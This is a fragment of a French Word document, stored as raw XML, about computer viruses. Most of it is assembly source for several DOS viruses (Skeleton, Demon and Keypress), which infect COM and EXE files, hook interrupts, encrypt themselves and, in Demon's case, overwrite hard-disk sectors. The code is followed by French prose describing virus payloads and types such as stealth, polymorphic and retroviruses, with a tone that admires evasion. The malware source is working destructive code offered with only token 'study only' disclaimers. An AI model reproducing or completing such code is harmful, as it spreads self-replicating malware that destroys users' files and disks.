        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="FF0000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>end start</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Skeleton virus:</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target.asm : [Skeleton] by Dek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Created wik the Phalcon/Skism Mass-Produced Code Generato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from the configuration file skeleton.cfg</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model tiny                             ; Handy directiv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ode                                   ; Virus code segme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org    100h                   ; COM file starting I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d = 'DA'                               ; ID word for EXE infection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ntry_point: db 0e9h,0,0                ; jmp decryp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startvir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decrypt:                                ; handles encryption and decryp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patch_startencryp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p,offset startencrypt   ; start of decryp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offset heap - offset startencrypt)/2 ; iteration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decrypt_loo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db   2eh,81h,76h,0            ; xor word ptr cs:[bp], xxx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decrypt_value dw  0                     ; initialised at zero for null ef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c  bp                       ; calculate new decryption loca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c  b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dec  ax                       ; If we are not done, the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decrypt_loop             ; decrypt mo'</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startencryp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next                     ; calculate delta offs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ext:     pop  bp                       ; bp = IP nex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ub  bp,offset next           ; bp = delta offs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sp,id                    ; COM or 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e   restore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estoreC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si,[bp+offset save3]</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i,10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di                       ; For later retur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short restoreEX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estore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                       ; DS = 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                       ; ES = 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si,[bp+offset oldCSIP2]</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di,[bp+offset oldCSI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sw</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sw</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sw</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estoreEX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sw</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yte ptr [bp+numinfec],3 ; reset infection count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1Ah                   ; Set new DTA</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dx,[bp+offset newDTA]    ; new DTA @ DS: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dx,[bp+offset exe_mas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infect_mas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dx,[bp+offset com_mas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infect_mas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done_infection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1ah                   ; restore DTA to defaul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80h                   ; DTA in PS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sp,id-4                  ; EXE or C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return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eturnC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n                          ; 100h is on stac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eturn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es                    ; AX = PSP segme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ax,10h                   ; Adjust for PS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word ptr cs:[bp+oldCSIP+2],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ax,word ptr cs:[bp+oldSSSP+2]</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i                           ; Clear intrpts for stack manipula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sp,word ptr cs:[bp+oldSSS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ss,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t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db   0eah                     ; jmp ssss:oooo</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ldCSIP   db ?                          ; Original CS:IP (4 byt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save3     db 0cdh,20h,0                 ; First 3 bytes of COM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ldSSSP   dd ?                          ; Original SS:S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ldCSIP2  dd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ldSSSP2  dd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reator   db '[MPC]',0                  ; Mass Produced Code Generato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irus     db '[Skeleton]',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author    db 'Deke',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nfect_mas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4eh                   ; find first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7                     ; any attribut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findfirstnex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                      ; DS:DX points to mas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exit_infect_mask         ; No mo files foun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or  cx,cx                    ; Clear attribut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attributes               ; Set file attribut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3d02h                 ; Open read/writ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chg ax,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3fh                   ; Read file to buff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dx,[bp+offset buffer]    ; @ DS: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1Ah                   ; 1Ah byt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4202h                 ; Go to end of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or  cx,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w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word ptr [bp+buffer],'ZM'; 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checkEXE                 ; Why yes, yes it i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heckC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word ptr [bp+newDTA+1Ah] ; Filesize in DTA</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ax,65535-(endheap-decrypt) ; Is it too larg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a   find_nex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word ptr [bp+buffer+1]; get jmp loca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cx,heap-startvirus+3     ; Adjust for virus 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ax,cx                    ; Already infect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e   find_nex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infect_c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heck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word ptr [bp+buffer+10h],id ; is it already infect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infect_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done_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5701h                 ; Restore creation date/tim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word ptr [bp+newDTA+16h] ; tim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word ptr [bp+newDTA+18h] ; dat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3eh                   ; Close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h,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l,byte ptr [bp+newDTA+15h] ; Restore original</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attributes               ; attribut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byte ptr [bp+numinfec], 0; Enough infection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find_nex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ax                       ; remove call from stac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done_infection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find_nex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4fh                   ; find next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short findfirstnex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xit_infect_mask: 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nfect_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 1a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bx                       ; Save file hand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s  ax,dword ptr [bp+buffer+14h] ; Save old entry po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oldCSIP2],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oldCSIP2+2],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s  ax,dword ptr [bp+buffer+0Eh] ; Save old stac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oldSSSP2],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oldSSSP2+2],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word ptr [bp+buffer+8]; Get header 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l, 4                    ; convert to byt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hl  ax, cl</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chg ax,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s  ax,dword ptr [bp+newDTA+26] ; Get file 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 es                   ; to DX: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ub  ax, bx                   ; Subtract header size fr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bb  dx, 0                    ; file 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 10h                  ; Convert to segment:offs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div  cx                       ; for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buffer+14h], dx ; New entry po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buffer+16h],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buffer+0Eh], ax ; and stac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buffer+10h], i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x                       ; get file lengt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bx                       ; Restore file hand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ax, heap-startvirus      ; add virus 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c  dx, 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l, 9</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hr  ax, cl</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or  dx, cl</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t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c  dx,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nd  ah, 1                    ; mod 512</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buffer+4], dx ; new file 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buffer+2],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                       ; restore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word ptr [bp+buffer+14h] ; needed lat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short finishinfec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nfect_com:                             ; ax = file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3</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ub  ax,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si,[bp+offset buff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di,[bp+offset save3]</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sw</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yte ptr [si-3],0e9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si-2],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ax,103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finishinfec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ax,offset startencrypt-offset decryp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2ch                   ; Get current tim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                      ; dh=sec,dl=1/100 se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p+decrypt_value],dx    ; Set new encryption valu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di,[bp+offset codestor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l,55h                   ; push b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to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si,[bp+offset decrypt]   ; Copy encryption func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startencrypt-decrypt  ; Bytes to mov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si                       ; Save for later us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p  mov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si,[bp+offset write]     ; Copy writing func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endwrite-write        ; Bytes to mov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p  mov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s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d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s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p  movsb                    ; Copy decryption func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p+patch_startencrypt+1],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l,5dh                   ; pop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to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l,0c3h                  ; ret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to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codestore                ; decryp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s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p  movsb                    ; Restore decryption func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4200h                 ; Move file point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or  cx,cx                    ; to beginning of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wd                           ; xor dx,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40h                   ; Write to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dx,[bp+offset buffer]    ; Write from buff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cx                       ; cx byt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dec  byte ptr [bp+numinfec]   ; One mo infec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done_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attribut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4301h                 ; Set attributes to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dx,[bp+offset newDTA+30] ; filename in DTA</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rit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bp                       ; Restore relativenes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40h                   ; Write to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ea  dx,[bp+offset decrypt]   ; Concatenate vir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heap-decrypt          ; # bytes to writ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b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ndwrit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xe_mask  db '*.exe',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om_mask  db '*.com',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heap:                                   ; Variables not in cod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The following code is the buffer for the write func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odestore:db (startencrypt-decrypt)*2+(endwrite-write)+3 dup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ewDTA    db 43 dup (?)                 ; Temporary DTA</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uminfec  db ?                          ; Infections this ru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buffer    db 1ah dup (?)                ; read buff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ndheap:                                ; End of vir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000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>end       entry_po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000000"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Demon Virus:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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Demon virus ==================================== 22.09.91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Assemble and link with:  TASM  DEMON.VI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TLINK DEMON /X/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Infect all .COM programs in current directory with: DEM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 NOT ON A TUESDAY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Constants and structur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Tuesday         =       2                       ; INT 21h, AH=2A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earch_Rec      struc                           ; directory search recor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db      21 dup (?)              ;   reserved for DO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FileAttr      db      ?                       ;   file attribu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FileTime      dw      ?                       ;   packed file tim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FileDate      dw      ?                       ;   packed file da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FileSize      dd      ?                       ;   long file siz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FileName      db      13 dup (?)              ;   ASCIIZ FILENAME.EX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earch_Rec      end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Demon virus segme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irus           segme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assume  cs:Virus,ds:Virus,es:Virus,ss:Viru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org     0080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DTA             Search_Rec &lt;&gt;                   ; disk transfer area</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org     0100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Demon:                                          ; virus entry poin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irus_Size      =       Virus_End - Demon       ; virus size = 272 byt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offset All_COM       ; find first .COM fi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4eh                  ;   including hidden/system</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110b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no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nc     Infect                  ; abort if no files foun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mp     short Check_Da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Infect:         call    Replicate               ; overwrite first 272 byt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offset DTA</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4fh                  ; find next .COM fi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go check day if none foun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nop                             ;   else repea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nc     Next_Fi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mp     short Check_Da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Next_File:      jmp     Infec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Check_Day:      mov     ah,2ah                  ; get DOS date, check da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cmp     al,Tuesday              ; Tuesday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e      Thrash_Drive            ; if yes, thrash drive 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4ch                  ;   else exit to DO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Thrash_Drive:   mov     Counter,0               ; overwrite first 160 sector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mp     Write_Sectors           ;   of drive C: with garbag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Write_Sectors:  mov     al,Drive_C              ; Error: doesn't work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160                  ; AL=C:, CX=160 sector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0                    ; DX=highest sector in driv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bx,0                    ; DS:BX=start of PSP area</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6h                     ; overwrite sector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c     Count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cmp     Counter,10              ; repeat 10 tim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e      Show_Msg</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ne     Write_Sector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Show_Msg:       mov     ah,09h                  ; show a fake error messag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offset Virus_Msg     ;   and exit to DO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4c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Replicate:      mov     dx,offset DTA.FileName  ; save file attribu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4300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OM_Attr,c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no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xor     cx,cx                   ; unprotect the .COM fi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4301h                ;   in case it's read-onl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no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3d02h                ; open .COM file for R/W,</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abort on erro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no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jc      Check_Day</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bx,ax                   ; BX = file hand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5700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                     ; save file date and tim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no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OM_Time,c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OM_Date,dx</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offset Demon         ; overwrite first 272 byte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40h                  ;   of .COM program fi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Virus_Size           ;   with the virus cod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no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5701h                ; restore file date and tim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COM_Da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COM_Tim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h,3eh                  ; close the fil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nop</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dx,offset DTA.FileName  ; restore file attribu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cx,COM_Att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mov     ax,430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int     21h</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ret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All_COM         db      '*.COM',0               ; dir search specificati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COM_Date        dw      0                       ; packed .COM program da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COM_Time        dw      0                       ; packed .COM program tim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COM_Attr        dw      0                       ; .COM program file attribute</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Counter         db      0                       ; used when thrashing drive C:</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Drive_C         db      2                       ; INT 26h C: drive number</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dw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Copyright       db      'Demonhyak Viri X.X (c) by Cracker Jack 1991 (IVRL)'</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dw      0</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irus_Msg       db      10,13,'Error eating drive C:',10,13,'$'</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irus_End       label   byte                    ; virus code+data end</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Virus           ends</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end     Dem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000000"/>
          <w:u w:val="single"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Keypress Virus:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="24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P E R F E C T  C R I M E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31.(o)79.426o79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For All Your H/P/A/V Files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SysOp: Peter Venkman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31.(o)79.426o79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P E R F E C T  C R I M E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NOT FOR GENERAL DISTRIBUTION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This File is for the Purpose of Virus Study Only! It Should not be Passed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Around Among the General Public. It Will be Very Useful for Learning ho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Viruses Work and Propagate. But Anybody With Access to an Assembler can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Turn it Into a Working Virus and Anybody With a bit of Assembly Coding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Experience can Turn it Into a far More Malevolent Program Than it Already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Is. Keep This Code in Responsible Hands!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Source code of the Keypress Virus - Made by XST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Made in A86 v3.07</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The Keypress Virus installs itself in top of DO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memory, without using DOS resident functions. It will</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hook int 1Ch (timer) and 21h (DOS) and will copy every</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10 minutes during 2 seconds the keys you press fiv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times (so if you press '1' it will be '111111') - i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you press no key, it will usually give ES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In DOS 3+ it spreads to every file executed - so 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can, besides COM/EXE, infect DRV/OVL/et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It also spreads itself in DOS 1 and 2 with a special</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routine - in this case only COM/EXE files will b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infect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It adds, after making full paragraphs of the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length, 1232 bytes to COM-files and 1216 to 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This code is only made to show the possibilities an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dangers of a virus. It is only intended for researc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urposes - spreading a virus is prohibited by law.</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NOTE - The compiled code is not 100% compatible wit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the Keypress virus. A86 compiles the 'ADD BX,AX' an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MOV DI,SI' different. This has totally no ef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on the progra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After compiling the new virus, enter the new size in paragraphs in VirPar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and compile agai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irParSize    equ 4Ch                      ; Size of the original KeyPress vir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irStart:     jmp long VirBegi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db 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omStart:     mov bx,cs               ; When the virus has infected a .COM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bx,[102h]           ; this is the jump to the virus. Actually,</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bx                   ; this code is overwritten with the cod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offset VirBegin                  ; in the end of the vir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B02          dw 02EBh                  ; 'jmp 104' - first 2 bytes in .COM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irSize       dw VirParSize shl 4                  ; Size of virus in whole par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irPars       dw VirParSize + 1                        ; Size of virus in pars+1</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MaxComSize    dw 0FF00h-VirParSize  ; Max. size .COM file to infect (100h stac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om_or_exe    db 00h                                ; 0 = Com-File, 1 = Exe-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Ax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Bx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Cx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Dx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Di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Si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Bp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Es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Ds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SS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_SP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xe_CS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xe_IP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VirBegin:     call Save_Regs                                    ; Start of vir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Fix_cs_ss      ; Fix CS and SS of orig. prog (for .EXE fil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Get_cs_ip                    ; Get CS and IP of original prog</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Check_res                      ; Check virus already reside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 Exit_inst                                           ; Yes,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Inst_mem                                  ; Install in memory</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 Exit_inst                                         ; Error,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Inst_ints                                   ; Hook interrupt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xit_Inst:    jmp short Rst_regs_prg</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no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Jmp_Prg:      db 0EAh                                 ; Jump to original progra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PrgOfs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PrgSeg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heck_res:    push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or bx,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s,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600h                                ; Unused word in memory</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word ptr [bx],1                           ; Already install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Installed                                                 ; Y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bx],1                                           ; No</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t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nstalled:    cm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For .EXE: Fix orig-prog CS and SS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Fix_cs_ss:    test byte ptr [Com_or_exe],1</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no_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ax,1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Exe_cs,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R_ss,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_Exe:       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Get CS + IP of orig. program, and for .COM: Restore first 16 bytes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Get_cs_ip:    mov ax,[Exe_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Exe_i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test byte ptr [Com_or_exe],1</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No_rest                 ; .EXE file: no restore of first byt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10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1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si,offset First_byt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i,10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pz                          ; Restore first 16 bytes (.COM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_rest:      mov [Prgseg],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Prgofs],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Save the registers to restore them after the virus has ended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Save_Regs:    mov cs:R_ds,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ax,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bx,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cx,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dx,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di,d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si,s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bp,b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es,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Restore regs for original program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st_regs_prg: mov ax,R_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R_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R_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R_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p,R_b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i,R_d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si,R_s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es,R_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test byte ptr [Com_or_exe],1</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No_StackRest                  ; No stack restore for .COM fil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ss,[R_ss]                                 ; Restore .EXE stac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sp,[R_s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t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_StackRest: mov ds,R_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short jmp_prg</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Restore regs for interrupts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st_regs_int: mov ax,R_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R_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R_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R_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p,R_b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i,R_d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si,R_s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es,R_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s,R_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Search for last MCB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Last_MCB:     push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dec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ext_MCB:     mov ds,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byte ptr [0],5Ah                                   ; Last MC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Is_last                                                   ; Y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c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bx,[3]                                            ; Go to nex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bx,0A000h                                            ; In R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 Next_MCB                                     ; No, try next on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s_Last:      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Install virus in end of memory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nst_Mem:     call Last_mcb                                    ; Search last MC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bx,0A000h                                            ; In R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 Not_ROM                                          ; No, continu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_Inst:      push cs                                                ; Yes,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tc                                   ; Error, virus not install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t_ROM:      mov ds,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3]                                    ; AX = Size last MC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ub ax,cs:[VirPars]                      ; - (Virussize in pars+1)</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e no_inst                              ; Not enough memory,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ax,80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 no_inst                        ; Less than 2048 pars free,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3],ax              ; Give program less space to install vir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bx,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c bx                                ; BX = seg where virus com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es:[2],bx            ; Enter in PSP, program not allowed ther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ub bx,10h                     ; - 10h pars (virus starts at 10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si,10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i,s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VirSize]                                  ; CX = virus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pz                                 ; Copy virus to virus-segme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c                                    ; No error, virus install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Install new interrupts (1C - Timer Tick, 21 - DOS)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nst_Ints:    push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Ticks],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351Ch                                 ; Get Addr Timer Tic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I1c_ofs,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I1c_seg,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3521h                                    ; Get Addr DOS-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I21_ofs,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I21_seg,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251C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offset New_I1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                               ; Install New Timer-Tick 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offset I21_dos12</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30h                                       ; Get DOS-Vers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al,3                                              ; Below 3.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 DosBel3</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offset new_I21                                ; No, new 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DosBel3:      mov ax,2521h                                 ; Install new DOS-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NEW 1C (TIMER TICK) INTERRUP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Every 10 minutes this routine sends during 2 sec. 180 extra keys to th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keyboard-interrup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Ticks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ew_I1c:      inc word ptr cs:[Ticks]     ; Increment 'Ticks after virus load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word ptr cs:[Ticks],2A30h                 ; 10 minutes pass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 org_I1c                                   ; No, go to orig. I1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word ptr cs:[Ticks],2A54h                     ; 2 sec. pass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e screw_keys                                ; Not yet, give ES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cs:[Ticks],0                      ; Time-counter to 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short Org_I1c                                ; Go to orig. I1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Screw_Keys:   push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5                                          ; 5 times / tic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Put_Key:      int 9                                             ; Give extra key</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oop Put_key</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rg_I1c:      db 0EAh                                    ; Jump far to orig. I1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1c_Ofs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1c_Seg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ew_I24:      mov al,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ew_I23:      i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23_Ofs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23_Seg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24_Ofs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24_Seg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ProgSize      dw (?)                                ; Program size in paragraph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ew_I21:      cmp ax,4B00h                             ; New DOS Int for DOS 3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Is_Star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far dword ptr cs:[I21_Ofs]                    ; Jmp orig. I 21</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s_Start:     call Save_Reg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InstCritInt               ; Install new ^c and crit. err. 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3D02h                        ; Open file for read and writ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s,R_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Close_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Read_head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Close_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Write_vir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Close_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Write_head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lose_File:   mov ah,3Eh                                            ; Close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RestCritInt                    ; Restore ^c and crit-err int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Rst_regs_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far dword ptr cs:[I21_Of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21_Dos12:    cmp ah,3Dh                       ; New DOS-Int for DOS 1.x and 2.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Is_Ope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JmpDos:       db 0EAh                                                 ; Jump Fa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21_Ofs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21_Seg       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s_Open:      push ax                                           ; Network-flag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nd al,0FC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JmpDos                                            ; Yes -&gt; DO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Save_Reg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InstCritInt               ; Install new ^c and crit. err. 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S,R_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or al,2                                             ; Write acces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far cs:[I21_Ofs]                                  ; Open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Open_Error                               ; Error opening -&gt; DO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Ax],ax                                        ; Save hand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Chk_Inf                         ; Check infection is possib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No_Infect                                          ; No -&gt;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Read_head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No_In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Write_vir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No_In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Write_head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_Infect:    call Go_file_beg                             ; Go to begin of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RestCritInt                    ; Restore ^c and crit-err int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Rst_regs_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f 2</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Open_Error:   call RestCritInt                    ; Restore ^c and crit-err int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Rst_regs_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short JmpDo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Buffer for header of program to infec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Head_buf      dw 0Ch dup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Install new ^C and crit. err. interrup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nstCritInt:  push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3523h                             ; Get Ctrl-Break Int Add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I23_Ofs,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I23_Seg,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3524h                              ; Get Crit. Err Int Add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I24_Ofs,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I24_Seg,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2523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offset New_I23                 ; Install new Ctrl-Break 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2524h                           ; Install new Crit. Err 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offset New_I24</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             pop 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Restore orig. ctrl-break and crit. err. interrup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estCritInt:  mov ax,2524h                           ; Rest. orig. crit. err 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ds dx,dword ptr cs:[I24_Of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2523h                          ; Rest. orig. ctrl-break in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ds dx,dword ptr cs:[I23_Of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Read header of file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Read_header:  mov ah,3F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offset Head_bu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18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HeadRead_Err                      ; Error reading, don't in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Check_infect ; Check file already infected; if not, save data</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HeadRead_Err                                      ; Error,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Calc_data                  ; Calculate data for infected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HeadRead_Err                                      ; Error,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HeadRead_Err: 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Write virus, and for .COM files, write first 16 bytes behind virus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rite_virus:  mov ah,40h                            ; Write virus behind progra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Vir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10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Err_Writ                                    ; Write error,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ax,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Err_Writ                                   ; '   ' '   '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test byte ptr [Com_or_exe],1</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First_Writ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First_Write:  mov ah,40h                 ; Write orig. 1st 16 bytes behind vir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1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offset Head_bu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c Err_Writ                                    ; Write error,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ax,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Err_Writ                                   ; '   ' '   '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c                                      ; End procedure, no erro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rr_Writ:     stc                                         ; End procedure, erro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COM: Write jump-to-virus, .EXE: Write header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rite_header: call Go_file_beg                             ; Go to begin of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test byte ptr [Com_or_exe],1                          ; .EXE-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Exe_head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40h                             ; .COM file - Write 'EB 02'</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2</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offset EB02</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40h                            ; Write program-size in par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2</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offset Prog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h,40h                          ; Write rest of begin of viru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0C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104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xe_header:   mov ah,40h                                         ; Write in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18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offset Head_bu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Change file pointer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ng_file_ptr: mov ax,420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Go to begin of file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Go_file_beg:  xor cx,cx                                        ; Filepointer = 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or dx,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Cng_file_ptr                            ; Change File Point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 xml:space="preserve">re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Check file is already infected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heck_infect: mov si,104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i,offset Head_buf+4</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yte ptr [Com_or_exe],0                        ; Flag for .C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word ptr [di-04],5A4Dh                              ; Is .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Is_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0Ch                                         ; No, .COM fi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pz                                           ; Already infect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Do_Infect                                            ; Not y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Dont_Infect:  st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Do_Infect:    cl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s_Exe:       mov byte ptr [Com_or_exe],1                        ; Flag for .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offset Head_buf+14h]                        ; cx = Prog-I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cx,offset VirBegin                           ; Same as Vir-I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Dont_Infect                                         ; Yes,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word ptr [offset Head_buf+0Ch],0           ; Max extra pars=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Dont_Infect                                         ; Yes,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Exe_ip],cx                                     ; Save prog-I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Head_buf+16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Exe_cs],cx                                     ; Save prog-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Head_buf+0E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ss],cx                                       ; Save prog-S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Head_buf+1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R_sp],cx                                       ; Save prog-S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short Do_In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Calculate data for infection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alc_data:    mov ax,4202h                                           ; Go to EO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or cx,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or dx,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test al,0Fh         ; Size mod 16 = 0 (File is exact x paragrap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No_par_add                            ; Yes, no extra par adde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ax,10h                                         ; Add paragrap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c dx,0                                      ; Overflow -&gt; Inc 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nd ax,0FFF0h                                    ; Make paragraph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_par_add:   test byte ptr [Com_or_exe],1</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Calc_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or dx,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not_in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ax,[maxcomsize]                                ; File too big?</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a not_infect                                          ; Yes,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 ax,[VirSize]                                 ; File too small?</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e Not_Infect                                         ; Yes, qui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ProgSize],ax                              ; Save program-siz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l,4</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hr word ptr [ProgSize],cl                         ; In paragraph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or cx,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Cng_file_ptr                                      ; Go to EO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t_Infect:   st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alc_exe:     push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ax,100h                                      ; 100 bytes stack</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c dx,0                                       ; Overflow - inc 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x,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Cng_file_ptr                                      ; Go to EO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ax,[VirSize]                                  ; New exe-lengt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c dx,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200h                                    ; For header: / 512</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div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or dx,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z No_Corr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c ax          ; Files below 2.000.000h bytes - length correctio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_Correct:   mov [Head_buf+2],dx                         ; Save new file-lengt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Head_buf+4],ax                         ; '  ' ' ' '  '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a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Calc_cs_s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Head_buf+10h],100h                    ; Prog-SP=10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word ptr [Head_buf+14h],offset VirBegin          ; Set prog-I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Proc: Calculate new CS and SS for .EXE file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alc_cs_ss:   push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4</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s_ss_lp:     shr dx,1</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cr ax,1</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loop Cs_ss_l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ub ax,[Head_buf+8]                               ; Size of heade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bb dx,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Head_buf+0Eh],ax                               ; Save prog-S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Head_buf+16h],ax                               ; Save prog-c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Check infection is possible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hk_Inf:      call Chk_exec                           ; Check file is executab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 Not_exe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all Get_attr                         ; Check file has no SYS att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t_Exec:     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Search-paths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om_path      db '.COM',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Exe_path      db '.EXE',0</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Check file is executable (.COM / .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Chk_Exec:     push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es,R_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i,d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or al,al</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80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pnz                                                 ; Search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ca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not_inf                                         ; No '.' foun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dec d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d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si,offset Com_path+4</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4</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st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pz                                                ; Check '.C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i</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no_com                                               ; No .COM</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short In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nop</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t_Inf:      st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Infect:       cld</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e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No_Com:       mov si,offset Exe_path+4</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cx,4</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pz                                                ; Check '.EX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mpsb</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not_inf                      ; No .EXE either - not executable</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mp short in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Get_Attr:     push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ax,4300h                                        ; Get FileAtt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xor cx,c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ds,R_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int 21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op d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b Bad_Attr                                 ; Error - don't in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test cx,4                                           ; System-Attr?</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jnz Bad_Attr                                   ; Yes, don't infec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cl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Bad_Attr:     stc</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First_bytes:  int 20h     ; First bytes of orig. program - here just 'Go to DOS'</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d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cs                                   ; Overwrites the begi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add bx,[102h]</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mov bx,offset VirBegin</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push bx</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xml:space="preserve">              </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>retf</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P E R F E C T  C R I M E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31.(o)79.426o79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For All Your H/P/A/V Files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SysOp: Peter Venkman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31.(o)79.426o79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P E R F E C T  C R I M E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 NOT FOR GENERAL DISTRIBUTION ***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This File is for the Purpose of Virus Study Only! It Should not be Passed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Around Among the General Public. It Will be Very Useful for Learning how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Viruses Work and Propagate. But Anybody With Access to an Assembler can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Turn it Into a Working Virus and Anybody With a bit of Assembly Coding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Experience can Turn it Into a far More Malevolent Program Than it Already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Is. Keep This Code in Responsible Hands!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                                                                            ;</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t>;****************************************************************************;</w:t>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80"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000080"/>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lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Maintenant regardons les fonctionnalités de différents virus:</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Armagedon: ce virus utilise vos ports locaux COM pour appeler un service local d'information en Grece, ne marche qu'avec des modems exploitant la ligne téléphonique.</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Melissa: marche avec Word97, ce virus en .doc s'auto-envoye aux gens dont les adresses e-mails apparaissent dans MS Outlook address book. Ouvert avec Word 2000 il réduit les paramètres de sécurité au minimum.</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Yankee 44 A/B: ce programme infecte tout les .exe et .com quand ceux-ci tournent</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Vascina TP 33: ce programme infecte les .exe et .com, si il trouve une version de lui plus ancienne que l'actuelle, il l'update par lui-même (nouvelle version)</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Tolbuhin 992/1004: ce virus infecte les fichiers .com, de plus le PC rame quand le virus essaye d'infecter un fichier</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>.</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Tequila: après sa première infection sur le disque-dur, il n'infecte que les 4 premiers mois, après quoi tout les 4 mois de l'infection il affiche un message d'anniversaire.</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Possessed 2443: après que le virus soit actif pour 15 à 20 minutes, tout programme qui tourne sera effacé. Quand aux fichiers infectés (.exe et .com) il contiendront le mot "POSSESSED!"</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PM trojan (OCX): ce programme remplace les fichiers PWL et de passwords ICQ de l'utilisateur du système: un animation apparait pour faire comme si rien de spécial n'arrive.</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Omega: quand le virus est activé un Vendredi 13, le symbole omega apparait et le disque-dur est réécrit.</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Nuke Marauder 860: tous les 2 février ce virus écrit sur les fichiers .com la commande INT 20h (retour à DOS).</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 xml:space="preserve">MSK 284/293: inefecte TOUS les .exe et .com dans le répertoire où il se trouve et peut corrompre le C: </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Keypress: je vous avais donné le code source plus haut, ce virus s'active toutes les 30 minutes.</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Hymn Hymn: quand le mois et le jour sont identiques (ex: 12/12) le virus détruit les secteurs boot du HD, joue de la musique, et affiche un message.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="0" w:leader="none"/>
        </w:tabs>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Anti-Pascal 605: le virus change la date et l'heure d'un programme infecté. De plus il efface tous les fichiers .bak et .pas.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:spacing w:lineRule="auto" w:line="240"/>
        <w:ind w:left="720" w:hanging="72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Remarque:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> il est évident que cette partie est incomplète, pour preuve: ceci ne sont des détails que sur les 750 virus que j'ai en banque de donnée. Il sort en moyenne 100 virus par mois, donc cette liste ne sert qu'à vous donnez un aspect global des fonctionnalités des différents vir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Les différents types de virus:</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a sert à rien de répéter ce qui est déjà dit, mais un article sur les virus sans ça, c'est dommag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 Virus de fichier, ou virus à action direc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s virus ajoutent leur code à celui de fichiers executables (avec l'extension .EXE, .COM, .SYS, et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Virus résident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s virus se chargent en mémoire centrale et, de là, contaminent d'autres programm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 Virus du secteur d'amorce des disqu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s virus remplace l'amorce d'un disque par leur propre code, déplacant cette amorce sur le disque et se chargent ensuite en premier en mémoire centrale, dés les premiers accés aux disqu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e là, il rendent inutilisable le disque d'amorçage ou se propagent à d'autre disque où ils commettent alors leurs Payload. (en englais action /méfai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Virus furtif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oici une catégories de virus qui échappe à toutes détection en se camoufla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l faut savoir qu'une méthode de détection classique des virus triviaux consiste à enregistrer la longeur d'un programme. L'orsque un virus frappe ce dernier, il ajoute son propre code ce qui par conséqunt accroît la taille du fichier infecté.</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Or, un virus furtif, lui, s'arrange pour qu'on lise toujours la même longeur pour le fichieer contaminé. Si vous lancez un Dir (sous Dos) par exemple, le virus détourne cette demande, effectue un petit calcul et hop! affiche la taille initial du fichier non contaminé. (pas con la petite bête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 Virus crypté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s virus cryptés sont encore plus vicieux. Ils modifie leur popre code par cryptage (XOR en assembleur pour les connaisseur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l existe des multitudes de moteur de cryptage dont le plus connus est le MTE (Mutation Engine) de Dark Aveng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 Virus polymorphe ou muta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s derniers sont encore plus malin car ils modifient leurs propre signature à chaque contamination. En effet, il faut savoir que les Anti-Virus recherche en priorité les signatures des virus, c'est à dire les chaînes de caractères qui lui sont propres. Et là, héhé ils sont pas dans la merde moi je vous le di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 Virus pièg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virus piège associe un virus connu à un virus encore inconnu. Vous détectez le premier et, tout happy vous l'éliminez en le détruisant, mais le secon lui subsiste. (Nice sho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 Rétrovir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rétrovirus est un virus spécialement créé pour contrer et déjouer les fonctions d'un logiciel antivirus donné. Connaissant le mode d'action de cet antivirus, il le contre et déjoue ses pièges.</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Pourquoi code-t-on les virus en assembleur:</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asm est l'abbréviation de "assembleur". Les fichiers programmés en assembleur et non compilés sont de type .asm., une fois compilés ils prennent la forme d'un .exe. Si les virus sont programmés en assembleur c'est parce que l'assembleur est le language machine, et qu'à partir du moment où un programme est programmé en assembleur il peut TOUT faire sur le système d'exploitat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rgrammer en assembleur requiert donc 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connaitre le système d'exploitat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connaitre ce language de programmat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tre avantage de l'assembleur, c'est que les programmes fait en assembleur sont assez petits (quelques ko), ce qui peut cependant évoquer une certaine méfianc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En quoi Linux/UNIX est "immunisé" contre les virus:</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inux a deux caractéristiques qu'il faut reteni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Exécution en mode protégé sur les processeurs x86. Protection de la mémoire entre les processus, afin qu'un programme ne puisse à lui seul compromettre le fonctionnement de l'ensemble du systèm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onc même si les virus ne peuvent pas se lancer, les mouchards (sniffers) le 